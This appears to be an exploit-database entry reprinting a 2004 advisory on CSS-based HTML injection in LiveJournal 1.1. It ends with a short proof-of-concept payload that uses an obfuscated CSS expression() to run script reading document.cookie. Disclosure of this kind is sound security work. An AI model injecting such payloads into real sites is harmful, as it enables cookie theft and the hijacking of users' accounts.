LiveJournal 1.1 - CSS HTML Injection
| EKU-ID: 29180 | CVE: | OSVDB-ID: |
| Author: Michael Scovetta | Published: 2004-02-23 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 29180 | CVE: | OSVDB-ID: |
| Author: Michael Scovetta | Published: 2004-02-23 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/9727/info
LiveJournal is reportedly prone to HTML injection via Cascading Style Sheet (CSS) tags. It is possible to inject hostile HTML and script code into journal entries through this vulnerability.
This could potentially be exploited to steal cookies from other site users. Other attacks are also possible.
<style>
.test1 { color:e\xpression(alert(document.cookie)); }
</style>
<a class="test1">foo</a>